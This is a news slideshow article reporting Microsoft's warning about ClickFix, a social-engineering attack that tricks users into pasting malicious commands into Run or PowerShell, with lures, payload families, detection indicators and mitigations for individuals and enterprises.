Microsoft alerts users about new ClickFix threat

ClickFix social-engineering attacks are on the rise

Microsoft has sounded the alarm on ClickFix, a sophisticated social engineering method that convinces users to execute malicious commands themselves.

The campaign typically begins with a phishing lure or fake “fix this problem” page that tricks the user into running a command in Windows Run, Terminal, or PowerShell.

Because the user executes the payload, many security systems struggle to detect it.

What ClickFix actually does

ClickFix uses a human-interaction step: users are directed to copy-and-paste commands or click “Fix” in a prompt, which leads to code execution.

Once the command runs, actors often deliver infostealers, RATs, or loaders that are loaded into memory by living-off-the-land binaries, a fileless execution style, though some campaigns also write scripts or scheduled tasks to disk during later stages.

The method relies on user trust and everyday computing behaviors rather than brute force. Microsoft says ClickFix can slip past conventional automation and signature-based protections because the user initiates command execution.

Arrival vectors and lures

Typical ClickFix campaigns begin with phishing emails, malvertising, compromised websites, or fake support dialogs. The victim receives a prompt like “Your system needs repair – click to fix” and is redirected to a page that instructs them to paste a command.

The commands are often loaded into the clipboard, making the process quick and seemingly benign. These lures are designed to bypass detection by appearing similar to legitimate support flows.

Command execution and payload deployment

Once the user pastes and runs the command, the attacker’s code takes over, often using living-off-the-land binaries (LOLBins) like PowerShell, mshta.exe, or regasm.exe to load malicious code.

The final payloads observed include infostealers like Lumma Stealer, RATs (AsyncRAT, NetSupport), rootkits, and other tools. Because malware is loaded dynamically, detection based on fixed signatures is difficult.

Why security tools struggle?

Because the user initiates the command, traditional signature-based detection and automated filters are often bypassed. The interactions look like normal user behaviour (copy-paste, terminal launch). The malicious code may run in memory without writing files to disk.

This makes ClickFix especially challenging for endpoint protection and email filters. Microsoft’s research emphasises that prevention must include user behaviour and policy controls.

Widening platform reach

Initially more prevalent on Windows, ClickFix campaigns are now seen targeting macOS, Android, and iOS, where possible.

For example, redirecting users to copy links or run scripts in Terminal on macOS, or drive-by downloads on mobile. As threat actors expand platforms, organisations must broaden their threat models beyond Windows workstations.

Real-world campaigns and case studies

Microsoft identifies campaigns such as Storm-1865 (targeting hospitality) that used ClickFix to distribute credential-stealing malware via fake Booking.com prompts.

The campaigns span regions (North America, Europe, Southeast Asia) and industries (finance, education, transportation). Attackers impersonate trusted brands, mimic support flows, and exploit human behaviour.

Target industries and high risk groups

ClickFix campaigns have primarily targeted sectors with high-value data: government, finance, education, critical infrastructure, hospitality, and transportation.

Organisations in these sectors often have staff trained for shortcuts to solve problems, exactly what ClickFix exploits. High-value targets may require stricter controls and greater awareness.

The role of the “help me fix it” narrative

ClickFix preys on human tendencies: when users believe something is broken or urgent, they follow instructions quickly. The prompt may say “Paste this command to fix your microphone” or “Verify you are human,” then instructs running a command.

The illusion of solving a problem is the hook. Training users to recognise that “help this fix” prompts from unfamiliar sources may be malicious is essential.

Detection and monitoring indicators

Organisations should monitor for odd patterns: clipboard paste into PowerShell, invocation of mshta.exe or regasm.exe after a user-initiated terminal launch, new scheduled tasks from unknown prompts, or browser flows that redirect to disguised CAPTCHA.

Microsoft recommends enabling logging (script-block, module), scrutinising Run dialog launches, and applying attack-surface-reduction rules.

Mitigations for individuals

For individual users: never paste commands from unfamiliar websites or emails; type commands only when you know what they do.

Avoid launching Run or Terminal based on a website prompt. Keep OS and antivirus updates applied, enable reputation-based protection, disable macros, and use non-admin accounts for everyday work. Awareness is the first line of defence.

Enterprise-level controls and policies

Enterprises should enforce least-privilege access (no local admin rights for normal users), enable attack-surface-reduction rules (block executing scripts, LOLBins), enable PowerShell logging and script-block, restrict Run/Terminal access where not needed, and monitor for unusual process execution.

Train staff about the ClickFix lures and ensure incident-response readiness.

Why user training matters more than ever?

Automated layers cannot catch everything when the user is the one running the command. Microsoft emphasises that behavioural training, recognising phishing, verifying requests, and avoiding “copy-paste fix” prompts, is more critical.

Regular simulated phishing exercises spotlight these types of threats. The human firewall remains a crucial part of defence.

Policy, governance and vendor-tool integration

Security policy must account for user-led execution attacks like ClickFix, governance, auditing, and vendor tools (EDR/XDR) that need to detect more than just malware.

Defence in depth: identity, endpoint, network, data, and behaviour must all tie together. Vendors like Microsoft now provide detection rules specifically for ClickFix. Organisations should subscribe to threat intel and apply recommended rules.

Future outlook and evolving tactics

ClickFix is still evolving: attackers are refining lures, expanding platforms, hiding via mobile and macOS, and using more subtle prompts.

The technique may become mainstream as human-interaction attacks yield high ROI. Defenders should assume the adversary may exploit any “help” or “fix” prompt in the future. Continuous awareness and adaptation are required.

Could an AI-crafted scam fool you right now? Explore AI-driven phishing is 4.5x more effective, Microsoft says.

Call to action

The ClickFix trend highlights that even the best technical defences can be undermined by clever lures and user behaviour. Prevention includes policy, tooling, and training.

Users: never blindly paste commands. Organisations: monitor and restrict command execution, enforce least privilege, and apply new rules. Attackers rely on us to “help them” fix our system; don’t give them the tool.

Also, check out how Microsoft issues alert on the GoAnywhere bug being exploited by ransomware groups.

Would you prioritise training staff about “copy-and-paste” command risks, or invest more in endpoint controls to catch suspicious command execution, and why? Share your thoughts.

Read More From This Brand:

• Microsoft flags 2 settings that slow Windows PCs
• Microsoft adds powerful AI upgrades to Windows 11, improving Copilot
• Microsoft Edge adds protection from sideloaded extensions

Don’t forget to follow us for more exclusive content right here on MSN.

If you like this story, you’ll LOVE our Free email newsletter. Join today and be the first to receive stories like these.

This slideshow was made with AI assistance and human editing.